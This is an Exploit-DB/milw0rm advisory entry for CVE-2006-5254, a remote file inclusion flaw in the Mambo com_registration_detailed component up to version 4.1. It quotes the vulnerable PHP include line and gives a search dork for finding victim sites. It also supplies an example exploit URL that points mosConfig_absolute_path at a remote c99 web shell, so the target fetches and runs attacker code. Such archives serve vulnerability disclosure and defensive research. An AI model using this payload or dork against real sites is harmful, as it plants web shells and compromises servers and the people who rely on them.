Mambo com_registration_detailed <= 4.1 - Remote File Include

2006-09-16T00:00:00
ID EDB-ID:2379
Type exploitdb
Reporter k1tk4t
Modified 2006-09-16T00:00:00

Description

Mambo com_registration_detailed <= 4.1 Remote File Include. CVE-2006-5254. Webapps exploit for php platform

                                        
                                                ########################################################################
    # Mambo com_registration_detailed &lt;= 4.1 Remote File Inclusion
    #  
    # Download Source  : http://mamboxchange.com/projects/regdetailed/
    # Dork =  allinur:com_extended_registration
    #
    # Found By: k1tk4t - k1tk4t[d0t]h4ck[4t]gmail[d0t]com
    # Location: Indonesia

    ########################################################################
    file ;
    registration_detailed.inc.php
    ########################################################################
    bugs ;
    [at]line 25

    include_once("$mosConfig_absolute_path/components/com_extended_registration/language/$_REGISTER_DETAILS_LANGUAGE.inc.php");
    #########################################################################
    example exploit ;
    http://victim.xxx/ components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phpshell/c99.txt?
    ########################################################################
    Thanks;
    str0ke
    milw0rm
    google
     #e-c-h-o (all member echo community)

     #nyubi (all member solpotcrew community)
    --&gt; ghoz, home_edition2001, iFX, and for all (friend's&enemy) 

# milw0rm.com [2006-09-16]